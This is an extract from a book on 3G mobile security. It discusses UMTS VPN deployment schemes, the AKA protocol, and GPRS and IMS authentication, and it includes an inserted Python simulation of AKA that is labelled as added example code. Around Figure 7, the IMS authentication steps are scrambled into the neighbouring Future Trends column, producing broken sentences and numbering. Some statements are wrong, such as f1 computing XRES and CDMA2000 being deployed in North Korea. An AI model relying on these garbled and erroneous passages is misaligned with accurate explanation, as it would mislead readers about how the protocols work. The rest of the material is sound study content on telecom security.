The end-to-end security scheme integrates the VPN functionality into the communicating peers, which negotiate and apply security. More specifically, an MS and a remote security gateway (SG) of a corporate private network establish a pair of IPsec SAs between them, which extend over the entire multi-nature communication path, as shown in Figure 12. Thus, sensitive data are secured as they leave the originator site (MS or SG) and remain protected while they are conveyed over the radio interface, the GPRS backbone network, and the public Internet, eliminating the possibility of being intercepted or altered by anyone.

The deployed end-to-end VPN has no interrelation with the underlying network operation

Figure 12. The end-to-end security scheme


and the provided network connectivity. It operates above the network layer and thus the security parameters, which are contained within the IPsec SA, are not affected by the MS movement. For this reason the MS may freely move within the UMTS coverage area, maintaining network connectivity and VPN service provision. The UMTS mobility management procedures keep track of the user location and therefore the incoming packets are routed to the MS. On the other hand, the end-to-end security scheme is not compatible with the legal interception option or any other application that requires access to the traversing data within the mobile network. The enforcement of network security policy, traditionally performed by border firewalls, is devolved to the end hosts, which establish VPN overlays. Despite this, the border firewalls remain to perform packet filtering and to counteract denial of service attacks.

Contrary to the end-to-end security scheme, the network-wide (Xenakis & Merakos, 2006) and the border-based (Xenakis et al., 2006) schemes integrate the VPN functionality into the UMTS network infrastructure, following a network-assisted security model. In both schemes an MS initiates a VPN that is negotiated and established by the network infrastructure, thus minimizing the impact on end users and their devices. The network operators provide the security aggregation facilities, which are shared among the network subscribers, as a complementary, value-added service. They have solid network management expertise and more resources to effectively create, deploy, and manage VPN services originating from mobile subscribers.

For the deployment of both security schemes (i.e., network-wide and border-based) the MS must be enhanced with a security client (SecC) and the UMTS core network should incorporate a security server (SecS). The SecC is employed by the user to request VPN services and express his preferences. It is a lightweight module that does not

Figure 13. The network-wide security scheme


Figure 14. The border-based security scheme

entail considerable processing and memory capabilities and thus it can be easily integrated in any type of mobile device, causing minor performance overhead. On the other side, the SecS establishes, controls, and manages VPNs between itself and remote SGs at corporate LANs on behalf of the mobile users. The SecS comprises an IPsec implementation modified to adapt to the client-initiated VPN scheme and the security service provision in a mobile UMTS environment. It can be readily integrated in the existing network infrastructure and thus both schemes can be employed as add-on features of UMTS.

The network-wide scheme (see Figure 13) integrates the SecS into the RNC of the UMTS network infrastructure. This scheme provides maximal security services to the communicating peers by employing the existing UMTS ciphering over the radio interface and extending a VPN over the UMTS backbone and the public Internet. Thus, sensitive user data remain encrypted for the entire network route between the originator and the recipient. In order to achieve VPN continuity as a mobile user moves and roams, the standard UMTS mobility management procedures need to be enhanced. The enhancements include the transfer of the related context (named the security context), which contains the details of the deployed security associations that pertain to the moving user, to the newly visited access point. This transfer enables the reconstruction of the security associations of the moving user at the newly visited access point, when the user connects to it, providing continuous VPN services from the end-user perspective. The network-wide scheme is compatible with legal interception; however, User Datagram Protocol (UDP) encapsulation is applied for Network Address Translation (NAT) traversal. Finally, the network security policy is enforced by the SGSN, which incorporates the SecS.

By placing the SecS in the GGSN, the border-based VPN deployment scheme is realized (see


Figure 14). This scheme protects data conveyance over the public Internet, which is a vulnerable network segment. The user mobility is transparent to the VPN operation, as long as the user remains under the same network operator coverage and is served by the same GGSN. However, whenever the mobile user roams to another GGSN, the existing security association cannot be used and a new VPN should be established. The border-based scheme is compatible with the legal interception option and NAT presence. Moreover, since the SecS resides at the GGSN, it also provides firewall services to the UMTS network, applying network security policy.

CONCLUSION

The evolution of 3G networks signifies a shift towards open and easily accessible network architectures, which raise major security concerns. To address these concerns, a specific security architecture, named the 3G security architecture, has been designed. This chapter has presented an analysis of the 3G security architecture. This architecture comprises a set of mechanisms that attempt to ensure that all information generated by or relating to a user, as well as the resources and services provided by the serving network and the home environment, are adequately protected against misuse or misappropriation. In addition to these mechanisms, a set of traditional security technologies designed for fixed and wireless networks can also be applied to protect 3G networks. Based on the analysis carried out, the critical points in the 3G security architecture, which might cause network and service vulnerability, have been outlined. Finally, the current research activities on UMTS security that aim at improving the UMTS security architecture have been briefly presented.

ACKNOWLEDGMENT

Work supported by the project CASCADAS (IST-027807) funded by the FET Program of the European Commission.

REFERENCES

3rd Generation Partnership Project (3GPP) TS 22.100 (v3.7.0). (2001). UMTS phase 1 Release 99. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/22_series

3rd Generation Partnership Project (3GPP) TS 23.002 (v3.6.0). (2002). Network architecture. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/23_series

3rd Generation Partnership Project (3GPP) TS 24.008 (v3.13.0). (2002). Mobile radio interface signaling layer 3 specification; Core network protocols—Stage 3. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/24_series

3rd Generation Partnership Project (3GPP) TS 25.401 (v3.10.0). (2002). UTRAN overall description. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/25_series

3rd Generation Partnership Project (3GPP) TS 31.111 (v3.7.0). (2001). USIM application toolkit (USAT). Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/31_series

3rd Generation Partnership Project (3GPP) TS 33.102 (v3.12.0). (2002). 3G security; Security architecture. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/33_series


3rd Generation Partnership Project (3GPP) TS 33.200 (v4.3.0). (2002). 3G security; Network domain security; MAP application layer security. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/Rel-4/33_series

3rd Generation Partnership Project (3GPP) TS 33.210 (v5.1.0). (2002). 3G security; Network domain security: IP network layer security. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/Rel-5/33_series

3rd Generation Partnership Project (3GPP) TR 33.908 (v3.0.0). (2000). 3G security; General report on the design, specification and evaluation of 3GPP standards confidentiality and integrity algorithms. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/R1999/33_series

3rd Generation Partnership Project (3GPP) TS 35.205 (v3.0.0). (2001). 3G security; Specification of the MILENAGE set: An example algorithm set for the 3GPP authentication and key generation functions f1, f1*, f2, f3, f4, f5, and f5*. Sophia-Antipolis Cedex, France: Author. Retrieved from ftp://ftp.3gpp.org/specs/2006-12/Rel-4/35_series

Gleeson, B., Lin, A., Heinanen, J., Armitage, G., & Malis, A. (2000). A framework for IP based virtual private networks (RFC 2764). Retrieved from http://tools.ietf.org/html/rfc2764

Gupta, V., & Gupta, S. (2001). Securing the wireless Internet. IEEE Communications Magazine, 39(12), 68-74.

Harkins, D., & Carrel, D. (1998). The Internet key exchange (IKE) (RFC 2409). Retrieved from http://www.ietf.org/rfc/rfc2409.txt

Kent, S., & Atkinson, R. (1998). Security architecture for the Internet Protocol (RFC 2401). Retrieved from http://www.ietf.org/rfc/rfc2401.txt

Wireless Application Forum (WAP). (n.d.). WAP specifications. Retrieved from http://www.wapforum.org/what/technical.htm

Xenakis, C., Loukas, N., & Merakos, L. (2006, April). A secure mobile VPN scheme for UMTS. In Proceedings of European Wireless 2006, Athens, Greece.

Xenakis, C., & Merakos, L. (2004a). IPsec-based end-to-end VPN deployment over UMTS. Computer Communications, 27(17), 1693-1708.

Xenakis, C., & Merakos, L. (2004b). Security in third generation mobile networks. Computer Communications, 27(7), 638-650.

Xenakis, C., & Merakos, L. (2006). Alternative schemes for dynamic secure VPN deployment over UMTS. Wireless Personal Communications, 36(2), 163-194.

Zhang, M., & Fang, Y. (2005). Security analysis and enhancements of 3GPP authentication and key agreement protocol. IEEE Transactions on Wireless Communications, 4(2), 734-742.

KEY TERMS

International mobile subscriber identity (IMSI): IMSI is a unique number associated with all UMTS network mobile phone users.

Internet key exchange (IKE): IKE is a protocol used to set up a security association (SA) in the IPsec protocol suite.

IP security (IPsec): IPsec is a suite of protocols for securing IP communications by authenticating and/or encrypting each IP packet in a data stream.

Temporary mobile subscriber identity (TMSI): TMSI is a randomly allocated number that is given to the mobile the moment it is switched on and serves as a temporary identity between the mobile and the network.

Third generation (3G): 3G is a technology in the context of mobile phone standards. The services associated with 3G include wide-area wireless voice telephony and broadband wireless data, all in a mobile environment.


Universal mobile telecommunications system (UMTS): UMTS is one of the 3G mobile phone technologies.

Universal subscriber identity module (USIM): USIM is an application for UMTS mobile telephony running on a UICC smart card which is inserted in a 3G mobile phone and stores user subscriber information and authentication information.

Wideband code division multiple access (WCDMA): WCDMA is a wideband spread-spectrum mobile air interface that utilizes the direct sequence code division multiple access (CDMA) signaling method to achieve higher speeds and support more users compared to the implementation of time division multiplexing (TDMA) used by 2G GSM networks.

ENDNOTES

1. || String concatenation.
2. ⊕ Exclusive or.




Chapter XXI
Access Security in UMTS
and IMS
Yan Zhang
Simula Research Laboratory, Norway

Yifan Chen
University of Greenwich, UK

Rong Yu
South China University of Technology, China

Supeng Leng
University of Electronic Science and Technology of China, China

Huansheng Ning
Beihang University, China

Tao Jiang
Huazhong University of Science and Technology, China

INTRODUCTION

Motivated by the requirements for higher data rate, richer multimedia services, and broader radio range, wireless mobile networks are currently in the stage of evolving from the second generation (2G), for example, the global system for mobile communications (GSM), into the era of the third generation (3G), beyond 3G, or the fourth generation (4G). The universal mobile telecommunications system (UMTS) is the natural successor of the currently popular GSM (http://www.3gpp.org); code division multiple access 2000 (CDMA2000) is the next generation version of CDMA-95, which is predominantly deployed in North America and North Korea. Time division-synchronous CDMA (TD-SCDMA) is in the framework of the 3rd generation partnership project 2 (3GPP2) and is expected to be one of the principal wireless technologies employed in China in the future (http://www.3gpp.org; 3G TS 35.206). It is envisioned that each of the three standards in the framework of international mobile telecommunications-2000 (IMT-2000) will play a significant role in the future due to backward compatibility, investment, maintenance cost, and even politics. In all of the potential standards, access security is one of the primary demands as well as challenges

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Access Security in UMTS and IMS

to resolve the deficiency existing in the second generation wireless mobile networks such as GSM, in which only one-way authentication is performed, for the core network to verify the user equipment (UE) (3G TS 24.008). Such access security may lead to the “man-in-the-middle” problem, which is a type of attack that can take place when two clients are communicating remotely and exchange public keys in order to initialize secure communications. If both public keys are intercepted en route by someone, he/she can act as a conduit and send in messages with his/her own faked public key. As a result, the secure communication is eavesdropped by a third party.

Multimedia service provisioning is one of the primary demands and motivations for the next generation wireless networks. To achieve this goal, the IP multimedia subsystem (IMS) is added as the core network in UMTS providing multimedia services, for example, voice telephony, video conferencing, real-time streaming media, interactive games, voice over IP, pictures, HTTP, and instant messaging (3G TS 33.203). Multimedia session management, initialization, and termination are specified and implemented in the session initiation protocol (SIP) (3G TS 29.228; Zhang & Fang, 2005). To ensure secure communication in a multimedia session, an efficient access security mechanism shall also be provided.

In this chapter, we make an introduction to access security in the next generation wireless mobile networks, including the mechanisms in the circuit-switched domain, the packet-switched domain, and also the emerging IMS domain.

BACKGROUND OVERVIEW

Figure 1 shows the UMTS network architecture with the components most related to security management (3G TS 29.002; 3G TS 33.102). The user terminal (UE) utilizes the circuit-switched or packet-switched service through the radio interface between the base station (BS) and itself. A BS is located in the center of a cell, which covers a radio range, and provides the wireless access point for UEs to the core network. The radio network controller (RNC) monitors and supervises the activities of the several BSs under its management. The radio access network (RAN) consists of the RNC and the associated BSs under the RNC. The home location register (HLR) stores the permanent information for the subscribers, for example, the International Mobile Subscriber Identity (IMSI), the subscribed service profile, and the identity of the current location area. The authentication center (AuC) is responsible for verifying the validity of the user’s activity, including call behavior and location management. Normally, the HLR and AuC are located in the same database/server. The serving GPRS support node (SGSN) connects the core network and the radio access network and is responsible for location management and for delivering packets between the UE and the core network. The gateway GPRS support node (GGSN) acts as a gateway between the core network and external IP networks such as the Internet, telecommunication networks, and enterprise intranets.

Figure 1. UMTS network architecture

Figure 2. UMTS network authentication and key agreement (AKA)

Figure 3. AKA phase 1: Distribution of authentication vector

ACCESS SECURITY IN UMTS

Figure 2 shows the most significant feature in the framework of UMTS security management, that is, authentication and key agreement (AKA) (3G TS 24.008). Authentication refers to the mutual authentication mechanism by which the subscriber is able to authenticate the network, and the network is also able to authenticate the user. Key agreement refers to the mechanism to generate the cipher key and the integrity key. The events triggering the AKA process include location update request, user registration, service request, attach request, detach request, and connection re-establishment request.

Figure 4. AKA phase 2: Authentication and key establishment

The authentication protocol is based on a permanent secret key K (128-bit) that is shared between the UE and the HLR/AuC. The AKA mechanism can be divided into two phases: the distribution of authentication vectors (DAV) from the HLR/AuC to the SGSN, as shown in Figure 3, and the authentication and key establishment between the UE and the core network, as illustrated in Figure 4.

Distribution of Authentication Vector

When a UE leaves an old SGSN (SGSNo) and moves into the coverage of a new SGSN (SGSNn), SGSNn has no corresponding record for the UE, which makes it necessary to authenticate the UE prior to any subsequent behavior. SGSNn delivers the message authentication data request (ADR) to the HLR/AuC with the UE’s unique IMSI. Based on the received IMSI, the AuC can find the associated record in its database and hence the corresponding master key K for this particular UE. Then, the HLR/AuC generates a number n of AVs instead of a single AV for the sake of saving signaling overhead. The AV structure is comprised of five components: (1) a random number RAND, (2) an expected authentication response XRES, (3) a cipher key CK, (4) an integrity key IK, and (5) a network authentication token AUTN (3G TS 23.060). In each generation, an AV is calculated by means of the authentication functions f1-f5, where for instance the function f1 is employed to compute XRES, the function f2 is used to compute RES, and the function f3 is used to compute CK (3G TS 33.105; 3G TS 35.205; 3G TS 35.206). After successfully generating n AVs, the AuC sends the AV array back to SGSNn via the message authentication data response, and SGSNn saves these n AVs for the particular UE. It is noteworthy that this phase executes not only upon the UE entering a new SGSN area, but also when there are no AVs available upon the arrival of an action which requires authentication.

Authentication and Key Establishment

For each activity triggering an authentication request, such as call origination, paging, or location update, the SGSN initiates the challenge user authentication request (UAR) message to the UE with the parameters RAND and AUTN, which are retrieved from the ith (i = 1, 2, …, n) AV in first-in-first-out (FIFO) manner. Upon receiving the AV, the UE checks the validity of AUTN. For this goal, the UE retrieves the SQN component from AUTN and calculates the expected message authentication code for authentication (XMAC-A). The UE then compares XMAC-A with the message authentication


code for authentication (MAC-A) component in AUTN; if they are equal, then the network is verified. Otherwise, the UE rejects the UAR and hence the network. After the network is identified, the UE checks the SQN freshness, that is, that the SQN has never been used before. When the network succeeds, the UE then computes the authentication response RES from the received RAND value and sends it in a user authentication response message to the SGSN. If RES equals the expected response XRES, then the UE is successfully authenticated. Since n AVs are generated and recorded in SGSNn during each operation of DAV while only one AV is used during an authentication event, the signaling between the SGSN and the HLR/AuC during DAV is not needed for every authentication event.

It is believed that, after the AKA procedure, all messages are given integrity protection, and the signaling data as well as the user data are given confidentiality protection. In the sense of integrity protection, the content of signaling messages should not be manipulated. With regard to confidentiality protection, the subscriber identification, location, user data, and signaling data should be encrypted.

ACCESS SECURITY IN IMS

There are three entities relevant to the IMS security architecture (see Figure 5). A proxy call session control function (P-CSCF) is located in the serving network of a UE and acts as the first access point in the serving network. The P-CSCF is responsible for forwarding SIP messages of a UE to the home network. A serving call session control function (S-CSCF) is located in the home network to provide session control of multimedia services and acts as a SIP registrar or SIP proxy server. The S-CSCF sends messages toward the home subscriber server (HSS) and the AuC to receive subscriber data and authentication information. An interrogating call session control function (I-CSCF) is located in the home network and acts as a SIP proxy toward the home network. The I-CSCF is responsible for selecting an appropriate S-CSCF for the UE and forwarding SIP requests/responses toward the S-CSCF.

Figure 5. IMS network architecture
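Before turning to the IMS procedure, the following is an added simulation of the UMTS AKA mechanism described in the preceding section; it is example code written for this page, not code from the chapter or from 3GPP. It models the HLR/AuC generating an ordered batch of n authentication vectors, the SGSN caching them and consuming them in FIFO order (so a DAV round trip happens only when the cache is empty), and the UE checking AUTN by comparing XMAC-A with MAC-A and then checking SQN freshness before it answers with RES. The functions f1..f5 are HMAC-SHA256 stand-ins for the MILENAGE set, not the real algorithms, and follow the 3GPP TS 33.102 mapping (f1 for MAC-A, f2 for RES/XRES, f3 for CK, f4 for IK, f5 for AK); the key K, the IMSI and the AMF value are constructed test values.

```python
"""Added example (not from the chapter): a simulation of UMTS AKA.

The HLR/AuC produces an ordered batch of n authentication vectors (DAV),
the SGSN caches them and consumes them FIFO, and the UE checks AUTN
(MAC-A first, then SQN freshness) before answering with RES.  f1..f5 are
HMAC-SHA256 stand-ins for MILENAGE (assumption), mapped as in 3GPP
TS 33.102: f1 -> MAC-A, f2 -> RES/XRES, f3 -> CK, f4 -> IK, f5 -> AK.
K, IMSI and AMF are constructed test values.
"""
import hashlib
import hmac
import secrets
from collections import deque

K = bytes.fromhex("465b5ce8b199b49faa5f0a2ee238a6bc")  # constructed 128-bit K
IMSI = "001010123456789"                               # constructed IMSI
AMF = b"\x80\x00"                                      # constructed AMF

def _prf(tag, key, data, n):
    """Keyed PRF truncated to n bytes; stand-in for MILENAGE (assumption)."""
    return hmac.new(key, tag + data, hashlib.sha256).digest()[:n]

def f1(key, rand, sqn, amf): return _prf(b"f1", key, rand + sqn + amf, 8)  # MAC-A
def f2(key, rand): return _prf(b"f2", key, rand, 8)    # RES / XRES
def f3(key, rand): return _prf(b"f3", key, rand, 16)   # CK
def f4(key, rand): return _prf(b"f4", key, rand, 16)   # IK
def f5(key, rand): return _prf(b"f5", key, rand, 6)    # AK, masks the 48-bit SQN
def xor(a, b): return bytes(x ^ y for x, y in zip(a, b))

class AuC:
    """HLR/AuC: keeps K and the SQN counter per IMSI, builds n AVs per request."""
    def __init__(self, subscribers):
        self.db = {imsi: {"K": k, "SQN": 0} for imsi, k in subscribers.items()}

    def send_authentication_info(self, imsi, n=3):
        rec, avs = self.db[imsi], []
        for _ in range(n):
            rec["SQN"] += 1                        # a fresh SQN for every AV
            sqn, k = rec["SQN"].to_bytes(6, "big"), rec["K"]
            rand = secrets.token_bytes(16)
            autn = xor(sqn, f5(k, rand)) + AMF + f1(k, rand, sqn, AMF)  # SQN^AK||AMF||MAC-A
            avs.append({"RAND": rand, "XRES": f2(k, rand), "CK": f3(k, rand),
                        "IK": f4(k, rand), "AUTN": autn})
        return avs

class SGSN:
    """Caches AVs per IMSI and runs DAV only when the cache is empty."""
    def __init__(self, auc):
        self.auc, self.cache, self.dav_calls = auc, {}, 0

    def challenge(self, imsi):
        queue = self.cache.setdefault(imsi, deque())
        if not queue:
            self.dav_calls += 1
            queue.extend(self.auc.send_authentication_info(imsi))
        return queue.popleft()                     # FIFO: each AV is used once

    @staticmethod
    def verify(av, res):
        return hmac.compare_digest(av["XRES"], res)

class UE:
    """Holds K (on the USIM) and the highest SQN accepted so far."""
    def __init__(self, k):
        self.K, self.sqn_seen = k, 0

    def answer(self, rand, autn):
        """Return (RES, CK, IK), or raise ValueError when the network is rejected."""
        sqn = xor(autn[:6], f5(self.K, rand))      # unmask SQN with AK
        amf, mac = autn[6:8], autn[8:16]
        if not hmac.compare_digest(f1(self.K, rand, sqn, amf), mac):
            raise ValueError("MAC failure: network not authenticated")
        sqn_int = int.from_bytes(sqn, "big")
        if sqn_int <= self.sqn_seen:               # freshness check
            raise ValueError("SQN failure: sequence number already used")
        self.sqn_seen = sqn_int
        return f2(self.K, rand), f3(self.K, rand), f4(self.K, rand)

def run_aka(rounds=4):
    """Authenticate `rounds` times; return (per-round success, DAV count)."""
    sgsn, ue, ok = SGSN(AuC({IMSI: K})), UE(K), []
    for _ in range(rounds):
        av = sgsn.challenge(IMSI)
        res, ck, ik = ue.answer(av["RAND"], av["AUTN"])
        ok.append(sgsn.verify(av, res) and ck == av["CK"] and ik == av["IK"])
    return ok, sgsn.dav_calls

def rejected_reason(tampered_mac=False):
    """Replay a used AV, or present one with a flipped MAC bit; report why the UE refused."""
    sgsn, ue = SGSN(AuC({IMSI: K})), UE(K)
    av = sgsn.challenge(IMSI)
    autn = av["AUTN"]
    if tampered_mac:
        autn = autn[:15] + bytes([autn[15] ^ 0x01])
    else:
        ue.answer(av["RAND"], autn)                # first use is accepted
    try:
        ue.answer(av["RAND"], autn)
    except ValueError as err:
        return str(err).split(":")[0]
    return "accepted"
```

With n = 3 vectors per DAV, four authentications cost two round trips to the AuC, which is the signaling saving the text describes. The two rejection paths show the order of the UE-side checks: a modified MAC-A is refused before the sequence number is even looked at, and an AUTN that was already accepted once is refused on the freshness check.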


Different from the one-pass authentication procedure in AKA illustrated in Figure 2, the security in IMS is a two-pass authentication procedure, including general packet radio service (GPRS) authentication and IMS authentication (3G TS 29.229). Before utilizing the IMS service, a UE should first set up a data connection to learn the IP address of the P-CSCF and to carry the SIP signaling messages through the P-CSCF. The data connection establishment is comprised of two steps, that is, attach and packet data protocol (PDP) context activation. The first phase, attach, is used to establish the mobility management context between the UE and the SGSN. During this procedure, the UE should perform GPRS authentication and GPRS registration to verify its validity and retrieve the subscriber profile, including subscribed services, quality of service (QoS) profile, IP address, and so on. Once the UE is attached, the second step, PDP context activation, follows to activate a PDP address and build the association between the SGSN and the GGSN. Only after attach and PDP context activation can a UE access IMS services through the registration process. The registration is necessary to inform the HSS of the location, to authenticate, and to download the subscriber profile to the S-CSCF. We will discuss GPRS authentication and IMS authentication in the following two subsections. The discussion of either GPRS registration or PDP context activation is out of scope and the readers are suggested to refer to the related technical specification (3G TS 33.102).

GPRS AUTHENTICATION

GPRS authentication is performed in the framework of GPRS mobility management (GMM) (http://www.3gpp2.org; 3G TS 33.102). Figure 6 shows the message sequence in GPRS authentication. In particular, the steps include:

1. The UE sends GMM Attach Request (IMSI) to the SGSN with the unique identity IMSI.

2. If the SGSN has at least one AV for the UE, then steps 2 and 3 are skipped. Otherwise, the SGSN has to obtain AVs from the entity HSS/AuC. The SGSN triggers the procedure DAV by sending a MAP-SEND-AUTHENTICATION-INFO Request (IMSI) message to the HLR/AuC with the parameter IMSI uniquely identifying the UE.

3. Upon receiving the authentication request, the HSS/AuC searches for the corresponding record in the database on the basis of the IMSI. Then, the HSS/AuC generates an ordered array of n AVs for the specific UE. Each AV consists of the following components: a random number RAND, an expected response XRES, a cipher key CK, an integrity key IK, and an authentication token AUTN. The HSS/AuC then sends back the message MAP-SEND-AUTHENTICATION-INFO Response to the SGSN with the AV array as parameters.

4. The SGSN stores these n AVs for the particular UE and shall choose the next unused AV in the ordered AV array. Subsequently, the SGSN shall challenge the UE and send the message GMM Authentication and Ciphering Request with the parameters RAND and AUTN populated from the selected AV.

5. The UE checks the validity of the received AUTN. In case it is acceptable, the UE shall calculate a response RES and send it back to the SGSN through the message GMM Authentication and Ciphering Response. The SGSN retrieves the expected response XRES from the selected AV and compares XRES with the received response RES. If they match, the authentication and key agreement is successfully completed and the keys CK and IK are retrieved for the following signaling confidentiality and integrity protection.

6. The SGSN sends a GMM Attach Accept message to the UE to indicate the completion of the successful attach procedure.

Figure 6. GPRS authentication

IMS AUTHENTICATION

After the procedures of GPRS authentication, GPRS registration, and PDP context activation, the UE has the IP address of the P-CSCF and is able to access the IMS services through the registration procedure using SIP and Cx commands as shown in Figure 7 (CWTS TSM 03.20; 3G TS 29.229). This procedure includes the IMS authentication and the IMS registration. In particular, the steps include:

1. To start registration, the UE sends a SIP REGISTER (IMPI, IMPU) message to the P-CSCF in the serving network. On receipt, the P-CSCF forwards the registration request to the I-CSCF of the home network. The I-CSCF then delivers the message to a chosen S-CSCF.

2. If the S-CSCF has at least one AV for the UE,  then steps 2 and 3 are skipped. Otherwise, the S-CSCF has to obtain AVs from the entity HSS/AuC. The S-CSCF triggers the procedure DAV by sending a Cx-AV-Req(IMPI, n) message to the HSS/AuC with the parameter IMPI uniquely identifying the UE and the number n of AVs wanted.

3. Upon receipt of a request from the S-CSCF, the HSS/AuC searches the database on the basis of the unique IMPI, obtains the subscriber profile, and generates an ordered array of n AVs for the specific UE. Each AV consists of the following components: a random number RAND, an expected response XRES, a cipher key CK, an integrity key IK, and an authentication token AUTN. Each AV is good for only one authentication and key agreement between the IMS subscriber and the S-CSCF. The HSS/AuC then sends back the message Cx-AV-Req-Resp(IMPI, RAND1||AUTN1||XRES1||CK1||IK1, …, RANDn||AUTNn||XRESn||CKn||IKn) to the S-CSCF with the array of AVs as parameters.

4. The S-CSCF chooses the first unused AV in the array of AVs based on the FIFO policy. From the selected AV, the items RAND, AUTN, IK, and CK are populated. The S-CSCF sends the message SIP 4xx-Auth-Challenge (IMPI, RAND, AUTN, IK, CK) to the I-CSCF, which then forwards the message to the P-CSCF. Upon receipt, the P-CSCF shall store the two keys IK and CK, remove the key information, and finally forward the



Figure 7. IMS authentication

rest of the message SIP 4xx-Auth-Challenge subscriber profile to the S-CSCF. HSS
(IMPI, RAND, AUTN) to the UE. shall send a Cx-Pull Response to the
.5 TheUEverifiesthefreshnessofthereceived S-CSCF with the indicated information.
AUTN and calculates a response RES. This 8. The S-CSCF sends SIP 200 OK mes-
result RES is sent back from the UE to the P- sage to the UE through the I-CSCF and
CSCF through the message SIP REGISTER P-CSCF. After this step, a security as-
(IMPI, RES). After receiving the request, sociate (SA) is active for the protection
the P-CSCF forwards it to the I-CSCF, which of subsequent SIP messages between the
further forwards the authentication response UE and the P-CSCF.
to the S-CSCF. The S-CSCF retrieves the
expected response XRES and compares
XRES and the received response RES. If they futurE trEnds
match, the authentication and key agreement
is successfully completed. Next three steps security Management in
perform registration. Heterogeneous network
6. The S-CSCF sends a Cx-Put message to
the HSS/AuC with the UE identity. The The next generation wireless mobile networks
HSS shall store the S-CSCF name, which are characterized as the co-existent of the variety
is presently serving the UE, and then sends of network architectures, protocols, and applica-
the Cx-Put Response for acknowledge- tions due to the diverse requirements for data rate,
ment. radio coverage, deployment cost, and multimedia
7. Next, the S-CSCF sends a Cx-Pull to the service. The 3GPP is actively specifying the roam-
HSS/AuC with the UE identity in order to ing mechanism in the integrated wireless LAN
download the related information in the (WLAN)/UMTS networks. It should be noted


Access Security in UMTS and IMS

that this scenario is only a specific heterogeneous network. The IEEE 802.16 standard is an emerging broadband wireless access system specified for wireless metropolitan area networks (WMAN) with the aim of bridging the last mile, replacing costly wireline access and also providing high-speed multimedia services in fast-moving transportation. The recently amended 802.16e adds a mobility component for WMAN and defines both physical and MAC layers for combined fixed and mobile operation in licensed bands. It is envisaged that future generation wireless networks will be the seamless integration of three technologies, WLAN, WMAN, and wireless wide area network (WWAN), where WLAN (e.g., IEEE 802.11 Wi-Fi) serves as the hot-spot access area for short range and very high speed; WMAN (e.g., IEEE 802.16 WiMAX) serves as the metropolitan-wide access network with high data rate; and WWAN (e.g., UMTS) provides the nation-wide network with relatively low data rate. The substantial technical challenge is to design and implement security architectures and protocols across such heterogeneous networks taking into account seamless mobility, scalability, and performance efficiency.

Security-Mobility Management Interaction and Security-Energy Tradeoff

The performance of security management interacts closely with the framework of mobility management. Mobility management includes two components: location management and handoff management (http://www.3gpp2.org). There are two operations in location management: updating the UE location and paging the UE. In UMTS, the SGSN shall authenticate a UE when the SGSN receives an "Initial L3 message" sent from the UE. This message is triggered by actions including location update request, connection management request, routing area update request, attach request, and paging response. It is clear that all these events are closely tied to the user's mobility management architecture and mechanism. Liang and Wang (2005) constructed an analytical model to evaluate the impact of authentication on security and QoS. The authors introduced a system model based on the widely used challenge/response mechanism. Then, a concept of security level is introduced to describe the different levels of communication protection with regard to the nature of security, that is, information secrecy, data integrity, and resource availability. By taking traffic and mobility patterns into account, the technique establishes a quantitative connection between security and QoS through the authentication and facilitates the evaluation of overall system performance under flexible, diverse security levels, mobility, and traffic processes.

Generally, a UE is powered by a battery and hence the mechanism for efficiently utilizing the limited energy is becoming very important. With more frequent authentication to increase security, the UE consumes more energy. With fewer authentications, incurring potential vulnerability, the UE is able to extend its lifetime before recharging. As a consequence, there is a trade-off between security and energy management. Potlapally, Ravi, Raghunathan, and Jha (2003) provided energy consumption measurements for a variety of ciphers, hash functions, and signature algorithms. Based on the observations, the study presented some reasoning about the energy-security trade-offs in determining key length. However, no analytical models have been proposed to evaluate the energy-security trade-offs or to make an intelligent decision on the trade-off.

Higher Security Protocols

Although AKA has been standardized, the protocol has two significant weaknesses: (1) the HLR/AuC does not verify whether the information sent from the visitor location register (VLR)/SGSN is valid or not; that is, AKA assumes that the link between VLR/SGSN and HLR/AuC is adequately reliable; and (2) for the UMTS integrity protection mechanism, the integrity key is transmitted without encryption and the user data are not protected. New strategies shall be designed to address these issues.



Harn and Hsin (2003) identified and discussed the inefficiency and complexity of keeping and managing the sequence number during network authentication. Based on the combination of hash chaining and keyed-hash message authentication code techniques, an enhanced scheme is proposed to simplify the protocol implementation and simultaneously provide strong, periodic mutual authentication.

Zhang and Fang (2005) showed that the 3GPP AKA protocol is vulnerable to a variant of the fake BS attack. The vulnerability allows an adversary to redirect user traffic from one network to another and to re-use corrupted AVs from one network in all other networks. To address such security problems in the current 3GPP AKA, the authors presented a new authentication and key agreement protocol, AP-AKA, which defeats the redirection attack and drastically lowers the impact of network corruption.

Security Protocols Performance

Security architectures and protocols are normally evaluated to guarantee the security, confidentiality, and integrity requirements. Recently, a few studies have appeared that investigate the authentication signaling traffic performance due to the rapidly increasing number of subscribers and the consequently high number of authentication requests and heavy burden on the signaling networks. Lin and Chen (2003) argue the disadvantages of fetching a constant number of AVs from the HLR/AuC. Based on observations of the mobility pattern, the authors proposed an adaptive scheme to generate an optimal size of AV array, which is able to significantly reduce the authentication signaling traffic and hence save the limited bandwidth. Zhang and Fujise (2006) argue the long delay problem and proposed a mechanism to address it. In particular, when the two entities SGSN and HLR/AuC are located far away from each other, the response time for an available AV may be very long. The consequences of long delay include call blocking and location update failure, and hence degraded QoS. To address this problem, the study proposed an enhanced scheme to fetch AVs earlier, before all AVs are used up. Compared with the original 3GPP Technical Specification TS 33.102 (2000), the proposed strategy is able to achieve a very low probability of waiting for an available AV with negligible additional signaling overhead and low storage cost. The study in Al-Saraireh and Yousef (2006) also analyzes the transmission overhead during the AKA procedure. It is proposed that security protocol performance should be evaluated both from the security perspective and from the signaling overhead point of view. New security protocols should combat potential vulnerabilities as well as introduce low additional signaling cost.

Conclusion

